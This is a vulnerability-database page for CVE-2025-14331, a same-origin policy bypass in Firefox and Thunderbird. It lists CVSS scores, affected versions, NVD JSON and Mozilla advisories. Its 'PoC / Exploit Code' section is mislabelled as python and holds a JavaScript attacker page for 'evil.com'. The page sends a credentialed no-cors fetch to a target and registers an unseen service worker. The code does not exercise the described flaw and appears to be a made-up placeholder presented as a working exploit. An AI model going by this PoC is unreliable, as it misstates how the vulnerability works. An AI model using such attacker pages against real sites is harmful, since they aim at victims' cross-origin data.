Security Vulnerability Report
中文
CVE-2025-14331 CVSS 6.5 MEDIUM

CVE-2025-14331

Published: 2025-12-09 16:17:41
Last Modified: 2026-04-13 15:16:47
Source: [email protected]

Description

Same-origin policy bypass in the Request Handling component. This vulnerability was fixed in Firefox 146, Firefox ESR 115.31, Firefox ESR 140.6, Thunderbird 146, and Thunderbird 140.6.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:mozilla:firefox:*:*:*:*:esr:*:*:* - VULNERABLE
cpe:2.3:a:mozilla:firefox:*:*:*:*:-:*:*:* - VULNERABLE
cpe:2.3:a:mozilla:firefox:*:*:*:*:esr:*:*:* - VULNERABLE
cpe:2.3:a:mozilla:thunderbird:*:*:*:*:esr:*:*:* - VULNERABLE
cpe:2.3:a:mozilla:thunderbird:*:*:*:*:-:*:*:* - VULNERABLE
Firefox < 146
Firefox ESR < 115.31
Firefox ESR < 140.6
Thunderbird < 146
Thunderbird < 140.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2025-14331 PoC - Same-Origin Policy Bypass // This PoC demonstrates the SOP bypass in Firefox Request Handling // Attacker page hosted on evil.com const attackerPage = ` <!DOCTYPE html> <html> <head><title>SOP Bypass PoC</title></head> <body> <h1>CVE-2025-14331 PoC</h1> <div id="result">Testing...</div> <script> // Attempt to bypass SOP and access cross-origin resource async function exploitSOPBypass() { try { // Create a crafted request that bypasses SOP checks // This exploits the vulnerability in Request Handling component const targetUrl = 'https://target-site.com/sensitive-data'; // Method 1: Using fetch with special headers const response = await fetch(targetUrl, { method: 'GET', mode: 'no-cors', credentials: 'include' }); // Method 2: Exploiting request handling logic // The vulnerability allows bypassing origin checks const img = new Image(); img.src = targetUrl; // Method 3: Using Service Worker manipulation if ('serviceWorker' in navigator) { // Register malicious service worker to intercept requests navigator.serviceWorker.register('/sw.js'); } document.getElementById('result').innerHTML = 'Exploit sent. Check console for details.'; } catch (e) { console.error('Error:', e); } } exploitSOPBypass(); </script> </body> </html> `; // Usage: Host this page on attacker-controlled domain // When victim visits, the script attempts to bypass SOP console.log('CVE-2025-14331 PoC loaded');

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14331", "sourceIdentifier": "[email protected]", "published": "2025-12-09T16:17:40.773", "lastModified": "2026-04-13T15:16:46.673", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Same-origin policy bypass in the Request Handling component. This vulnerability was fixed in Firefox 146, Firefox ESR 115.31, Firefox ESR 140.6, Thunderbird 146, and Thunderbird 140.6."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-346"}]}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-346"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:firefox:*:*:*:*:esr:*:*:*", "versionEndExcluding": "115.31.0", "matchCriteriaId": "22C1C512-2D57-4BCB-ABE2-5CA41F354AA1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:firefox:*:*:*:*:-:*:*:*", "versionEndExcluding": "146.0", "matchCriteriaId": "3EF4CBBC-DCB5-4540-8B8A-91DA759ED631"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:firefox:*:*:*:*:esr:*:*:*", "versionStartIncluding": "116.0", "versionEndExcluding": "140.6.0", "matchCriteriaId": "AB211B63-E6CF-4D11-BCEE-CF495FA0B0EF"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:thunderbird:*:*:*:*:esr:*:*:*", "versionEndExcluding": "140.6.0", "matchCriteriaId": "F04F8674-52CC-4217-B94A-8C5E80C5B996"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:thunderbird:*:*:*:*:-:*:*:*", "versionEndExcluding": "146.0", "matchCriteriaId": "1CB46BC7-512D-45BF-BCF4-73FDDF94DBAF"}]}]}], "references": [{"url": "https://bugzilla.mozilla.org/show_bug.cgi?id=2000218", "source": "[email protected]", "tags": ["Issue Tracking", "Permissions Required"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2025-92/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2025-93/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2025-94/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2025-95/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2025-96/", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.